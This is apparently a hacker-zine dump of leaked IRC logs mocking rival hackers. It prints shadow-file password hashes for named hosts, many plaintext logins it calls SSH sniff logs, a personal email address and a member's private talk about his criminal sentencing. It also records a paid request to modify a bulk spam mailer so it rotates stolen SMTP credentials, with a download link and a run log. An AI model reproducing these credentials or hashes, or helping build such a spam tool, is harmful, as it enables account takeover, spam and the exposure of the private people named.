[MSGS ] [04:24am] - fearsom ~fearsom@67.19.256.256 just found another box
with it
[MSGS ] [04:24am] - fearsom ~fearsom@67.19.256.256 \;
[MSGS ] [04:52am] - fearsom ~fearsom@67.19.256.256 from your box
[MSGS ] [04:52am] - fearsom ~fearsom@67.19.256.256 yesterday
[MSGS ] [04:52am] - fearsom ~fearsom@67.19.256.256 i know that wasnt me
[NOTICES ] [07:20am] - fearsom plz notice the topic as site is down atm
PLZ N0T1C3 Y0UR B0X3Z W3R3 RM'D
3Y3'LL S4V3 Y0U TH3 3MB4R4ZZM3NT C4RL.. & 0NLY P0ST TH3Z3 2 SH4D0WZ F0R N0W.
(W3 R JUZT T00 L4ZY T0 G0 THR0UGH TH3 QU4RT3R G1G 0F H4QL0GZ W3 G0T 0N Y0U).
eu.kas.net.au
root:$1$ujo0InKC$a6nh4tysOkTN6Ft2GfaVV.:12740:0:99999:7:::
carl:$1$ZWEqzaIw$7nW/k9Evso9V1ZOD8DodK1:12732:0:99999:7:::
cactiuser:$1$qvCBjir9$DNW2HGjb/WnqHGhZ/2Vty1:12733:0:99999:7:::
pd:$1$LkLGEb6t$JFjab9MxSUq0ANtFUguVY0:12759:0:99999:7:::
thebug:$1$C6iAxjB7$3up7FymevwxI0MVZmUL23.:12744:0:99999:7:::
hellman:$1$x58ZXTf0$MoUdNZRWqH7M9XLuKMuvZ.:12744:0:99999:7:::
jizonu:$1$3w6k0JV1$71O0YT89s3dw.nkc7vMYK1:12745:0:99999:7:::
dns:$1$iSUa3Kf/$tL4ODD03JnLh68sgv.LRi/:12768:0:99999:7:::
kas07.kas.net.au
root:$1$72ATKfWX$fwi7MA8.DViY9r6Nxugrd0:12493:0:99999:7:::
hellman:$1$u/UKeSgu$1vqSVsW/mxhJTCskiAU8g1:12493:0:99999:7:::
pd:$1$pXIVIeEp$l0YLB/xrvmhkJZCKo9AW//:12736:0:99999:7:::
f:$1$2c71DTUx$0yfpCbGFq1Yb539LzS2X8.:12499:0:99999:7:::
bob:$1$qlqICTTj$iIwWYyS1.8yenY.UHbXUj1:12574:0:99999:7:::
harq:$1$9onG2xj8$8QboUVUAKFE.wFuapjHso/:12607:0:99999:7:::
dark:$1$SH7H8OtF$Uu9Hr5vNoj2F8rDq/6S0/0:12690:0:99999:7:::
silvio, harq, bobdash, the_bug, pd... th1z tru3ly 1z a h4q3r h43v3n!
3nt3r th3 l34gu3 0f th3 .au sp4mm3rz!
19.txt -~-~-~ ptp un3th1c4l h4ck1ng
TH1Z 1Z FR0M TH3 H3LLM4N CH4TL0GZ.. 1T SH0ULD G0 1N TH0Z3, BUT W3 SUQ @ M4K1NG 4 ZIN3. M0R3
CH4TL0GZ, C4UZ3 3V3R0N3 L1K3Z T0 R34D TH3M S0 FUQ1NG MUCH... & ALL H0NO KN0WZ H0W T0 D0 1Z SN1FF
IRC TR4FF1C. M4YB3 N3XT Y34R W3 W1LL G3T S0M3 M0R3 0D4YZ.
[MSGS ] [10:42pm] - arcanum arc@mall.pulltheplug.com i simply dont have the connections or money i need to do business shit
[MSGS ] [10:42pm] - arcanum arc@mall.pulltheplug.com i pretty much gave up on trying
[SEND_MSG] [10:42pm] - arcanum what about applying for a job ?
[MSGS ] [10:43pm] - arcanum arc@mall.pulltheplug.com now i'm just sitting here waiting to goto jail or die
[MSGS ] [10:43pm] - arcanum arc@mall.pulltheplug.com yea i've been looking for work
[SEND_MSG] [10:43pm] - arcanum any work ? or just selective work ?
[MSGS ] [10:43pm] - arcanum arc@mall.pulltheplug.com had a few interviews that "looked promising"
[MSGS ] [10:43pm] - arcanum arc@mall.pulltheplug.com but ended up just flopping
[MSGS ] [10:43pm] - arcanum arc@mall.pulltheplug.com no work at all
[SEND_MSG] [10:43pm] - arcanum maybe you need to compromise in the sorts of work you are applying for ?
[MSGS ] [10:43pm] - arcanum arc@mall.pulltheplug.com yea
[SEND_MSG] [10:43pm] - arcanum while you have a shit job
[MSGS ] [10:44pm] - arcanum arc@mall.pulltheplug.com i guess i could go work a burger king or mc donalds
[SEND_MSG] [10:44pm] - arcanum that pays something (something > nothing)
[SEND_MSG] [10:44pm] - arcanum you can still apply for something better
[SEND_MSG] [10:44pm] - arcanum in the mean time
[SEND_MSG] [10:44pm] - arcanum while you work a shit job
[SEND_MSG] [10:44pm] - arcanum and if you get a better job
[SEND_MSG] [10:44pm] - arcanum then you can quit the shit job easy as pie
[SEND_MSG] [10:44pm] - arcanum makes sense..
[SEND_MSG] [10:44pm] - arcanum then you'll have more $ than you currently have
[MSGS ] [10:44pm] - arcanum arc@mall.pulltheplug.com shrug
[MSGS ] [10:44pm] - arcanum arc@mall.pulltheplug.com i pretty much lost all motivation
[SEND_MSG] [10:44pm] - arcanum you'll have something to keep your mind busy on other than irc
[MSGS ] [10:44pm] - arcanum arc@mall.pulltheplug.com to do anything
[MSGS ] [10:44pm] - arcanum arc@mall.pulltheplug.com heh
[SEND_MSG] [10:44pm] - arcanum which kinda degrades the mind for motivation on other shit and what not
[MSGS ] [10:45pm] - arcanum arc@mall.pulltheplug.com i rarely irc
[MSGS ] [10:45pm] - arcanum arc@mall.pulltheplug.com heh
[SEND_MSG] [10:45pm] - arcanum would you rather work at say burger king making $x/hr or making wargame servers for people you dont know ?
[MSGS ] [10:45pm] - arcanum arc@mall.pulltheplug.com i just idle on irc
[MSGS ] [10:45pm] - arcanum arc@mall.pulltheplug.com i'm usually doing other things
[MSGS ] [10:45pm] - arcanum arc@mall.pulltheplug.com programming little, reverse engineering, playing games, watching movies
[MSGS ] [10:45pm] - arcanum arc@mall.pulltheplug.com just
[MSGS ] [10:45pm] - arcanum arc@mall.pulltheplug.com nothing PRODUCTIVE
[MSGS ] [10:45pm] - arcanum arc@mall.pulltheplug.com i miss being productive
[MSGS ] [10:45pm] - arcanum arc@mall.pulltheplug.com heh
[SEND_MSG] [10:46pm] - arcanum whos court is the ball in ?
[MSGS ] [10:46pm] - arcanum arc@mall.pulltheplug.com what do you mean?
[MSGS ] [10:46pm] - arcanum arc@mall.pulltheplug.com i feel like i lost control
[MSGS ] [10:46pm] - arcanum arc@mall.pulltheplug.com heh
[MSGS ] [10:46pm] - arcanum arc@mall.pulltheplug.com i dont have any control over my future
[SEND_MSG] [10:46pm] - arcanum is the glass 1/2 full or 1/2 empty \;
[MSGS ] [10:46pm] - arcanum arc@mall.pulltheplug.com havent had control for 3 years
[SEND_MSG] [10:47pm] - arcanum how long do you have to wait to find out what the story is ?
[MSGS ] [10:47pm] - arcanum arc@mall.pulltheplug.com i dont know
[MSGS ] [10:47pm] - arcanum arc@mall.pulltheplug.com supposably
[MSGS ] [10:47pm] - arcanum arc@mall.pulltheplug.com this next court date
[MSGS ] [10:47pm] - arcanum arc@mall.pulltheplug.com is final one
[MSGS ] [10:47pm] - arcanum arc@mall.pulltheplug.com april 12th
[SEND_MSG] [10:47pm] - arcanum ahh
[SEND_MSG] [10:47pm] - arcanum hrmm
[SEND_MSG] [10:47pm] - arcanum what do you think the likely outcome will be ?
[MSGS ] [10:47pm] - arcanum arc@mall.pulltheplug.com i'll goto federal prison for 6 months to a year
[MSGS ] [10:47pm] - arcanum arc@mall.pulltheplug.com which isnt bad
[MSGS ] [10:48pm] - arcanum arc@mall.pulltheplug.com compared to the 20 years i should be doing
[MSGS ] [10:48pm] - arcanum arc@mall.pulltheplug.com not to mention the boatload of relevant conduct
[MSGS ] [10:48pm] - arcanum arc@mall.pulltheplug.com i'll prolly end up having to pay 80k-100k in restitution
[MSGS ] [10:48pm] - arcanum arc@mall.pulltheplug.com over the course of the rest of my life
[SEND_MSG] [10:48pm] - arcanum thats not 'that' much
[SEND_MSG] [10:49pm] - arcanum what happens after that 6months-year ?
[SEND_MSG] [10:49pm] - arcanum you free to do what you want ?
[MSGS ] [10:49pm] - arcanum arc@mall.pulltheplug.com no
[MSGS ] [10:49pm] - arcanum arc@mall.pulltheplug.com i'm on probation for another 5 years after that
[SEND_MSG] [10:50pm] - arcanum like no computers probation or just dont get in trouble again probation ?
[MSGS ] [10:51pm] - arcanum arc@mall.pulltheplug.com not sure
[MSGS ] [10:51pm] - arcanum arc@mall.pulltheplug.com but i'm pretty sure
[MSGS ] [10:51pm] - arcanum arc@mall.pulltheplug.com the judge will let me use computers
[MSGS ] [10:52pm] - arcanum arc@mall.pulltheplug.com this sucks so bad still
[MSGS ] [10:52pm] - arcanum arc@mall.pulltheplug.com even after 3 years
[MSGS ] [10:52pm] - arcanum arc@mall.pulltheplug.com heh
[MSGS ] [10:52pm] - arcanum arc@mall.pulltheplug.com dont know where people like PD get off thinking my life is just the same as before
[MSGS ] [10:52pm] - arcanum arc@mall.pulltheplug.com where i have a job and everything
[MSGS ] [10:52pm] - arcanum arc@mall.pulltheplug.com ...
[MSGS ] [10:52pm] - arcanum arc@mall.pulltheplug.com not even close to the truth
[SEND_MSG] [10:53pm] - arcanum ya
[SEND_MSG] [10:53pm] - arcanum hrmm
[SEND_MSG] [10:53pm] - arcanum maybe its time to find a new hobby
[SEND_MSG] [10:53pm] - arcanum away from the pc ?
[MSGS ] [10:54pm] - arcanum arc@mall.pulltheplug.com yea maybe i should take up gardening
[SEND_MSG] [10:54pm] - arcanum plenty of other things out there
[SEND_MSG] [10:55pm] - arcanum maybe find something new
[SEND_MSG] [10:55pm] - arcanum that will motivate you again
[MSGS ] [10:55pm] - arcanum arc@mall.pulltheplug.com honestly i odnt know wtf i'm going to do
[MSGS ] [10:55pm] - arcanum arc@mall.pulltheplug.com hopefully things will be ore clear when i get sentenced
[MSGS ] [10:55pm] - arcanum arc@mall.pulltheplug.com i'll be able to say
[MSGS ] [10:55pm] - arcanum arc@mall.pulltheplug.com "ok 6 years and i'll be free again"
[MSGS ] [10:55pm] - arcanum arc@mall.pulltheplug.com =\
[MSGS ] [10:55pm] - arcanum arc@mall.pulltheplug.com "6 years and i'll be able to do xyz again"
[SEND_MSG] [10:56pm] - arcanum 6 years is a long time
[SEND_MSG] [10:56pm] - arcanum do you want to be back where you started in 6 years time ?
[SEND_MSG] [10:56pm] - arcanum probably not..
[SEND_MSG] [10:56pm] - arcanum maybe if you do go in for 6 months
[MSGS ] [10:56pm] - arcanum arc@mall.pulltheplug.com i wont have a choice
[MSGS ] [10:56pm] - arcanum arc@mall.pulltheplug.com well
[SEND_MSG] [10:56pm] - arcanum use htat time to un-addict your self
[MSGS ] [10:56pm] - arcanum arc@mall.pulltheplug.com i figure
[MSGS ] [10:56pm] - arcanum arc@mall.pulltheplug.com 6 months
[SEND_MSG] [10:56pm] - arcanum then you cna start fresh
[MSGS ] [10:57pm] - arcanum arc@mall.pulltheplug.com when i get out
[SEND_MSG] [10:57pm] - arcanum with ideas
[MSGS ] [10:57pm] - arcanum arc@mall.pulltheplug.com for another 6 months i'll be still controlled
[MSGS ] [10:57pm] - arcanum arc@mall.pulltheplug.com after that
[MSGS ] [10:57pm] - arcanum arc@mall.pulltheplug.com things will be lax enough for me to be able to do what i want
[MSGS ] [10:57pm] - arcanum arc@mall.pulltheplug.com again
[MSGS ] [10:57pm] - arcanum arc@mall.pulltheplug.com i'm not really addicted
[SEND_MSG] [10:57pm] - arcanum find a woman
[SEND_MSG] [10:57pm] - arcanum theres a start
[MSGS ] [10:57pm] - arcanum arc@mall.pulltheplug.com i just have simply nothing else to do with my time
[MSGS ] [10:57pm] - arcanum arc@mall.pulltheplug.com wish it was that easy
[SEND_MSG] [10:58pm] - arcanum well wait the 6 months then before you start looking im guessing heh
[MSGS ] [10:58pm] - arcanum arc@mall.pulltheplug.com lol
[MSGS ] [10:58pm] - arcanum arc@mall.pulltheplug.com i'm going to be 23
[MSGS ] [10:58pm] - arcanum arc@mall.pulltheplug.com this november
[MSGS ] [10:58pm] - arcanum arc@mall.pulltheplug.com 23 and i have nothing to show for myself
[MSGS ] [10:59pm] - arcanum arc@mall.pulltheplug.com no car
[MSGS ] [10:59pm] - arcanum arc@mall.pulltheplug.com no money
[MSGS ] [10:59pm] - arcanum arc@mall.pulltheplug.com no job
[MSGS ] [10:59pm] - arcanum arc@mall.pulltheplug.com if my mom told me
[SEND_MSG] [10:59pm] - arcanum you need to stop thinking about everyone else
[MSGS ] [10:59pm] - arcanum arc@mall.pulltheplug.com "get the fuck out of my house"
[SEND_MSG] [10:59pm] - arcanum and think about yourself
[MSGS ] [10:59pm] - arcanum arc@mall.pulltheplug.com i'd own nothing
TH1Z 1Z 0UR G1FT T0 MRX F0R H1Z N3XT B00K.
[SEND_MSG] [11:58am] - #vortex ssh -l root james.kalifornia.com
[SEND_MSG] [11:58am] - #vortex /lib/
[SEND_MSG] [11:59am] - #vortex or /usr/lib
[SEND_MSG] [11:59am] - #vortex one of the 2
[SEND_MSG] [11:59am] - #vortex dude
[SEND_MSG] [11:59am] - #vortex i know a lot more
[SEND_MSG] [11:59am] - #vortex than people give me credit for
[SEND_MSG] [11:59am] - #vortex i just dont go and talk shit
[SEND_MSG] [11:59am] - #vortex like msot
[SEND_MSG] [12:00pm] - #vortex root@ns.linux.com's password: Huntington
[SEND_MSG] [12:00pm] - #vortex shrug
[SEND_MSG] [12:04pm] - #vortex jessi:netPo90Afrika$n@q.arc.nasa.gov
[SEND_MSG] [12:04pm] - #vortex raquele:netPo90Afrika$n@q.arc.nasa.gov
[SEND_MSG] [12:04pm] - #vortex petermc:wyei$7@petermc.lbl.gov
[SEND_MSG] [12:04pm] - #vortex raquele:netPo99Afrika$n@q.arc.nasa.gov
[SEND_MSG] [12:04pm] - #vortex gobridge:2Sxnv470@shell3.ba.best.com
[SEND_MSG] [12:04pm] - #vortex petermc:wyei$7@petermc.lbl.gov
[SEND_MSG] [12:04pm] - #vortex shrug
[SEND_MSG] [12:04pm] - #vortex want intel.com ?
[SEND_MSG] [12:04pm] - #vortex microsoft.com
[SEND_MSG] [12:04pm] - #vortex you name it
[SEND_MSG] [12:04pm] - #vortex come 1999
[SEND_MSG] [12:04pm] - #vortex i had most shit
[SEND_MSG] [12:04pm] - #vortex around
[SEND_MSG] [12:04pm] - #vortex unlike most people tho
[SEND_MSG] [12:04pm] - #vortex i kept to my self
[SEND_MSG] [12:05pm] - #vortex and didnt past shit like that
[SEND_MSG] [12:05pm] - #vortex in chans
[SEND_MSG] [12:05pm] - #vortex and ge fucked up
[SEND_MSG] [12:05pm] - #vortex get*
[SEND_MSG] [12:05pm] - #vortex i played dumb
[SEND_MSG] [12:05pm] - #vortex shrug
[SEND_MSG] [12:05pm] - #vortex 2 secs
[SEND_MSG] [12:07pm] - #vortex lol
[SEND_MSG] [12:08pm] - #vortex but the book is going to take a while to write
[SEND_MSG] [12:08pm] - #vortex he might be done by then
[SEND_MSG] [12:08pm] - #vortex remember this xt ?
[SEND_MSG] [12:08pm] - #vortex username = likwid9
[SEND_MSG] [12:08pm] - #vortex passwd = jedl8CP
[SEND_MSG] [12:08pm] - #vortex Compaq's Tru64 Unix 4.0d (JAVA) AS1200 2@533MHz (ev56) telnet to
[SEND_MSG] [12:08pm] - #vortex 192.233.54.145
[SEND_MSG] [12:08pm] - #vortex Debian 2.1 Linux on Intel Proliant 4@200MHz telnet to 192.
[SEND_MSG] [12:08pm] - #vortex 233.54.143
[SEND_MSG] [12:08pm] - #vortex Redhat 6.2 Linux on Alpha DS20 2@500MHz (ev6) telnet to 192.
[SEND_MSG] [12:08pm] - #vortex ... etc
[SEND_MSG] [12:09pm] - #vortex xt got owned ?!
S0 D1D Y0U, Y0U DUMB FUQN CUNT. H3LLM4N + XT = B1GG3ZT M0UTHZ 1N H4Q1NG.
"WANT ROOT ON FNORD.IO.COM?" XT - 2006
1Z TH4T TH3 0NLY B0X Y0U FUQN L4M3RZ H4V3 3V3R R00T3D???
[MSGS ] [03:47pm] - arcanum arc@mall.pulltheplug.com stupid politics
[SEND_MSG] [03:48pm] - arcanum what provoked it ?
[SEND_MSG] [03:49pm] - arcanum <Josh> just cos i hate you arc
[SEND_MSG] [03:49pm] - arcanum <Josh> doesnt mean i hate the network
[SEND_MSG] [03:49pm] - arcanum someting between u and josh i take it
[MSGS ] [03:49pm] - arcanum arc@mall.pulltheplug.com so irritating
[MSGS ] [03:49pm] - arcanum arc@mall.pulltheplug.com yea
[MSGS ] [03:49pm] - arcanum arc@mall.pulltheplug.com he's mad i pretty much run ptp
[MSGS ] [03:50pm] - arcanum arc@mall.pulltheplug.com so he provoked a fight
[MSGS ] [03:50pm] - arcanum arc@mall.pulltheplug.com riled up a bunch of people
PLZ H4Q ARC4NUM.
[SEND_MSG] [05:46pm] - arcanum mel:Pearljam@shell.one.net
[SEND_MSG] [05:47pm] - arcanum queerskin:guinness@queernet.org
[SEND_MSG] [05:47pm] - arcanum zillah:treakle732@feeding.frenzy.com
[SEND_MSG] [05:47pm] - arcanum raquele:netPo99Afrika$n@q.arc.nasa.gov
[SEND_MSG] [05:47pm] - arcanum gobridge:2Sxnv470@shell3.ba.best.com
[SEND_MSG] [05:47pm] - arcanum petermc:wyei$7@petermc.lbl.gov
[SEND_MSG] [05:47pm] - arcanum gobridge:u!V3zU7i@shell3.ba.best.com
[SEND_MSG] [05:47pm] - arcanum mel:Pearljam@shell.one.net
[SEND_MSG] [05:47pm] - arcanum jessi:netPo90Afrika$n@q.arc.nasa.gov
[SEND_MSG] [05:47pm] - arcanum raquele:netPo90Afrika$n@q.arc.nasa.gov
[SEND_MSG] [05:47pm] - arcanum petermc:wyei$7@petermc.lbl.gov
[SEND_MSG] [05:47pm] - arcanum
[SEND_MSG] [05:47pm] - arcanum
[SEND_MSG] [05:47pm] - arcanum they be all ssh sniff logs from fnord.io
[MSGS ] [06:01pm] - arcanum arc@mall.pulltheplug.com yea that's eris
[SEND_MSG] [06:01pm] - arcanum [SEND_MSG] [08:08pm] - #hellman sv@smoke.dope.org's password: : sm00ti3
[SEND_MSG] [06:01pm] - arcanum [SEND_MSG] [08:08pm] - #hellman queerskin@queernet.org's password: : AbuNuwas
[SEND_MSG] [06:01pm] - arcanum [SEND_MSG] [08:08pm] - #hellman jdunson@miyu.cc.vt.edu's password: : Vamp4C0w
[SEND_MSG] [06:01pm] - arcanum [SEND_MSG] [08:08pm] - #hellman peery@password.io.com's password: : admin.io
[SEND_MSG] [06:01pm] - arcanum [SEND_MSG] [08:08pm] - #hellman heh
[MSGS ] [06:02pm] - arcanum arc@mall.pulltheplug.com dope.org
[SEND_MSG] [06:02pm] - arcanum
[SEND_MSG] [06:02pm] - arcanum
[SEND_MSG] [06:02pm] - arcanum mdfranz@ssh.cisco.com's password: : l1nxrl2999
[SEND_MSG] [06:02pm] - arcanum
[SEND_MSG] [06:02pm] - arcanum h0 h0
[MSGS ] [06:02pm] - arcanum arc@mall.pulltheplug.com ROTLFMOA
[MSGS ] [06:02pm] - arcanum arc@mall.pulltheplug.com that was from eris
[SEND_MSG] [06:02pm] - arcanum [SEND_MSG] [08:08pm] - #hellman kndn@atlantis.io.com's password: : Knencv9*
[SEND_MSG] [06:02pm] - arcanum [SEND_MSG] [08:08pm] - #hellman peery@password.io.com's password: : admin.io
[SEND_MSG] [06:02pm] - arcanum [SEND_MSG] [08:08pm] - #hellman mdfranz@ssh.cisco.com's password: : l1nxrl2999
PTP, 3TH1C4L H4Q1NG.
[SEND_MSG] [04:09pm] - #social SPAM > *
[SEND_MSG] [04:09pm] - #social !!!!!!!!!!
[SEND_MSG] [04:10pm] - #social arcanum woulda got PAID if he could finish jobs.. \;
[SEND_MSG] [04:19pm] - #social i got more work
[SEND_MSG] [04:19pm] - #social if you were interested
[SEND_MSG] [04:19pm] - #social coding work i cant be bothered with
[SEND_MSG] [04:19pm] - #social mods to existing apps
[SEND_MSG] [04:20pm] - #social yes
[SEND_MSG] [04:20pm] - #social just .c
[SEND_MSG] [04:20pm] - #social apps are basic enoguh
[SEND_MSG] [04:21pm] - arcanum example
[SEND_MSG] [04:21pm] - arcanum :
[SEND_MSG] [04:21pm] - arcanum i got a linux mailer
[SEND_MSG] [04:21pm] - arcanum pretty clean code
[SEND_MSG] [04:21pm] - arcanum w/ normal smtp protocl shit
[SEND_MSG] [04:21pm] - arcanum e.g.
[SEND_MSG] [04:21pm] - arcanum helo world
[SEND_MSG] [04:21pm] - arcanum rcpt from: blah@blah.com
[SEND_MSG] [04:21pm] - arcanum mail to: shit@shit.com
[SEND_MSG] [04:21pm] - arcanum data
[SEND_MSG] [04:22pm] - arcanum asdf asoif oaish dfoaih dfh fhsdoiadf
[SEND_MSG] [04:22pm] - arcanum .
[SEND_MSG] [04:22pm] - arcanum orwhatever the noral smtp protocol is
[MSGS ] [04:22pm] - arcanum arc@mall.pulltheplug.com ok
[SEND_MSG] [04:22pm] - arcanum need to change it to
[SEND_MSG] [04:22pm] - arcanum helo world
[SEND_MSG] [04:22pm] - arcanum user: loginname
[SEND_MSG] [04:22pm] - arcanum pass: password
[SEND_MSG] [04:22pm] - arcanum rcpt from: blah@blah.com
[SEND_MSG] [04:22pm] - arcanum mail to: shit@shit.com
[SEND_MSG] [04:22pm] - arcanum data
[SEND_MSG] [04:22pm] - arcanum rest as per norm
[MSGS ] [04:22pm] - arcanum arc@mall.pulltheplug.com that's a pretty easy change
[MSGS ] [04:23pm] - arcanum arc@mall.pulltheplug.com where is username / pass specified
[MSGS ] [04:23pm] - arcanum arc@mall.pulltheplug.com command line?
[SEND_MSG] [04:23pm] - arcanum just gotta read in a random l/p combo from a external file
[MSGS ] [04:23pm] - arcanum arc@mall.pulltheplug.com config file?
[MSGS ] [04:23pm] - arcanum arc@mall.pulltheplug.com nod
[MSGS ] [04:23pm] - arcanum arc@mall.pulltheplug.com not difficult
[MSGS ] [04:23pm] - arcanum arc@mall.pulltheplug.com the application threaded?
[SEND_MSG] [04:23pm] - arcanum yes
[SEND_MSG] [04:23pm] - arcanum code is pretty straight forward i think from me looking at it
[MSGS ] [04:24pm] - arcanum arc@mall.pulltheplug.com yea
[MSGS ] [04:24pm] - arcanum arc@mall.pulltheplug.com how large
[MSGS ] [04:24pm] - arcanum arc@mall.pulltheplug.com is the external file?
[SEND_MSG] [04:24pm] - arcanum i duno .. anywhere from a few hundred to a few thousand
[SEND_MSG] [04:24pm] - arcanum just read in a random one
[MSGS ] [04:24pm] - arcanum arc@mall.pulltheplug.com lines?
[MSGS ] [04:24pm] - arcanum arc@mall.pulltheplug.com nod
[SEND_MSG] [04:25pm] - arcanum yes 1 per line
[SEND_MSG] [04:25pm] - arcanum however you want the format
[SEND_MSG] [04:25pm] - arcanum like
[SEND_MSG] [04:25pm] - arcanum user:pass
[SEND_MSG] [04:25pm] - arcanum or whatever doesnt matter
[MSGS ] [04:25pm] - arcanum arc@mall.pulltheplug.com nod
[MSGS ] [04:25pm] - arcanum arc@mall.pulltheplug.com just like
[MSGS ] [04:25pm] - arcanum arc@mall.pulltheplug.com a function
[MSGS ] [04:25pm] - arcanum arc@mall.pulltheplug.com than opens the file
[MSGS ] [04:25pm] - arcanum arc@mall.pulltheplug.com jumps to a random line
[MSGS ] [04:25pm] - arcanum arc@mall.pulltheplug.com reads user:pass into an array
[SEND_MSG] [04:25pm] - arcanum ya
[MSGS ] [04:25pm] - arcanum arc@mall.pulltheplug.com then uses them
[MSGS ] [04:25pm] - arcanum arc@mall.pulltheplug.com well
[SEND_MSG] [04:25pm] - arcanum probably on init() load them all into memory and then call a random one from memory when u actually sendmail()
[SEND_MSG] [04:25pm] - arcanum or some shit
[SEND_MSG] [04:26pm] - arcanum save opening the file 23983289 times a second
[MSGS ] [04:26pm] - arcanum arc@mall.pulltheplug.com that's possible too
[MSGS ] [04:26pm] - arcanum arc@mall.pulltheplug.com alot of memory might be used up though
[MSGS ] [04:26pm] - arcanum arc@mall.pulltheplug.com i mean i could allocate it on the fly
[SEND_MSG] [04:27pm] - arcanum its only like 1000 l/p combos to store in memory.. that cant be that much can it ?
[MSGS ] [04:27pm] - arcanum arc@mall.pulltheplug.com ah
[MSGS ] [04:27pm] - arcanum arc@mall.pulltheplug.com so it's a static number of entries?
[SEND_MSG] [04:27pm] - arcanum yeah
[SEND_MSG] [04:27pm] - arcanum in a .txt
[MSGS ] [04:27pm] - arcanum arc@mall.pulltheplug.com would there ever be more than 1000 ?
[SEND_MSG] [04:27pm] - arcanum well make it max 5000 or something
[SEND_MSG] [04:27pm] - arcanum *shrug*
[MSGS ] [04:27pm] - arcanum arc@mall.pulltheplug.com yea
[MSGS ] [04:28pm] - arcanum arc@mall.pulltheplug.com if it wasn that
[MSGS ] [04:28pm] - arcanum arc@mall.pulltheplug.com then i could like
[MSGS ] [04:28pm] - arcanum arc@mall.pulltheplug.com make it a static array
[SEND_MSG] [04:28pm] - arcanum list is static
[MSGS ] [04:28pm] - arcanum arc@mall.pulltheplug.com smaller function
[MSGS ] [04:28pm] - arcanum arc@mall.pulltheplug.com less calls
[SEND_MSG] [04:28pm] - arcanum might change once a week or so
[MSGS ] [04:28pm] - arcanum arc@mall.pulltheplug.com to malloc
[SEND_MSG] [04:30pm] - arcanum that something that sounds like you could be intersetd in ?
[MSGS ] [04:31pm] - arcanum arc@mall.pulltheplug.com sure
[MSGS ] [04:31pm] - arcanum arc@mall.pulltheplug.com i mean
[SEND_MSG] [04:31pm] - arcanum do you have time to do this is another thing
[MSGS ] [04:31pm] - arcanum arc@mall.pulltheplug.com i dont need the src as of right now
[MSGS ] [04:31pm] - arcanum arc@mall.pulltheplug.com i can work ont he function
[MSGS ] [04:31pm] - arcanum arc@mall.pulltheplug.com is it functionalized?
[MSGS ] [04:31pm] - arcanum arc@mall.pulltheplug.com is there an init() ?
[SEND_MSG] [04:31pm] - arcanum i can give you the source
[SEND_MSG] [04:31pm] - arcanum thats no probs
[MSGS ] [04:32pm] - arcanum arc@mall.pulltheplug.com who wrote it for you?
[SEND_MSG] [04:32pm] - arcanum you just cnat hand out the source to anyone else
[SEND_MSG] [04:33pm] - arcanum kinda arrangement
[MSGS ] [04:33pm] - arcanum arc@mall.pulltheplug.com yea
[MSGS ] [04:33pm] - arcanum arc@mall.pulltheplug.com i dont do that
[MSGS ] [04:33pm] - arcanum arc@mall.pulltheplug.com heh
[SEND_MSG] [04:33pm] - arcanum www.kas.net.au/far/far.zip
[MSGS ] [04:33pm] - arcanum arc@mall.pulltheplug.com sec
[MSGS ] [04:34pm] - arcanum arc@mall.pulltheplug.com k
[MSGS ] [04:35pm] - arcanum arc@mall.pulltheplug.com got it
[SEND_MSG] [04:35pm] - arcanum k run it and it spawns a local web interface as well
[SEND_MSG] [04:35pm] - arcanum default on port 8080
[SEND_MSG] [04:35pm] - arcanum so go to http://ip:8080/
[SEND_MSG] [04:35pm] - arcanum and u can see how it works
[SEND_MSG] [04:35pm] - arcanum pretty straight forward
[MSGS ] [04:35pm] - arcanum arc@mall.pulltheplug.com mofo is using host by name
[MSGS ] [04:35pm] - arcanum arc@mall.pulltheplug.com if ((hp = gethostbyname(host)) == NULL) return (ARESOLVE);
[MSGS ] [04:35pm] - arcanum arc@mall.pulltheplug.com wtf
[MSGS ] [04:35pm] - arcanum arc@mall.pulltheplug.com ..
[MSGS ] [04:36pm] - arcanum arc@mall.pulltheplug.com that's not thread safe
[MSGS ] [04:36pm] - arcanum arc@mall.pulltheplug.com is this thing fast?
[SEND_MSG] [04:36pm] - arcanum yes
[MSGS ] [04:36pm] - arcanum arc@mall.pulltheplug.com interesting
[MSGS ] [04:36pm] - arcanum arc@mall.pulltheplug.com ok
[MSGS ] [04:36pm] - arcanum arc@mall.pulltheplug.com well
[MSGS ] [04:36pm] - arcanum arc@mall.pulltheplug.com i guess you have your reasons
for not asking him to add shit
[MSGS ] [04:36pm] - arcanum arc@mall.pulltheplug.com :)
[SEND_MSG] [04:36pm] - arcanum bysin wrote it
[SEND_MSG] [04:37pm] - arcanum the one who writes all those worms that go around the net
[SEND_MSG] [04:37pm] - arcanum i didnt get it form him directly
[SEND_MSG] [04:38pm] - arcanum if thats an issue of whether i will pay
[SEND_MSG] [04:38pm] - arcanum you can ask solarx
[MSGS ] [04:38pm] - arcanum arc@mall.pulltheplug.com no
[MSGS ] [04:38pm] - arcanum arc@mall.pulltheplug.com you've paid me before
[SEND_MSG] [04:38pm] - arcanum every time hese done something for him ive paid him + tipped him as well
[MSGS ] [04:39pm] - arcanum arc@mall.pulltheplug.com wow
[MSGS ] [04:39pm] - arcanum arc@mall.pulltheplug.com this is beutiful
[SEND_MSG] [04:40pm] - arcanum the web interface ?
[SEND_MSG] [04:40pm] - arcanum or the code ?
[MSGS ] [04:40pm] - arcanum arc@mall.pulltheplug.com the code
[SEND_MSG] [04:40pm] - arcanum whats your email addy ?
[MSGS ] [04:41pm] - arcanum arc@mall.pulltheplug.com dalvarez@gmail.com
[MSGS ] [11:01am] - arcanum arc@mall.pulltheplug.com hehe
[MSGS ] [11:01am] - arcanum arc@mall.pulltheplug.com arc@mall:~/projects/far$ !gcc
[MSGS ] [11:01am] - arcanum arc@mall.pulltheplug.com gcc -o fahrenheit fahrenheit.c -lpthread -w
[MSGS ] [11:01am] - arcanum arc@mall.pulltheplug.com arc@mall:~/projects/far$ !./
[MSGS ] [11:01am] - arcanum arc@mall.pulltheplug.com ./fahrenheit usb.fhm file
[MSGS ] [11:01am] - arcanum arc@mall.pulltheplug.com Fahrenheit v8.0
[MSGS ] [11:01am] - arcanum arc@mall.pulltheplug.com Parsing configuration file... [ OK ]
[MSGS ] [11:01am] - arcanum arc@mall.pulltheplug.com Parsing Login:Password Pairs... [ OK ]
[MSGS ] [11:01am] - arcanum arc@mall.pulltheplug.com Setting system wide open file limit... [FAILED]
[MSGS ] [11:01am] - arcanum arc@mall.pulltheplug.com Listening on port 6232... [ OK ]
[MSGS ] [11:01am] - arcanum arc@mall.pulltheplug.com Going into the background, connect to the webserver by going to http://199.173.14.2:6232
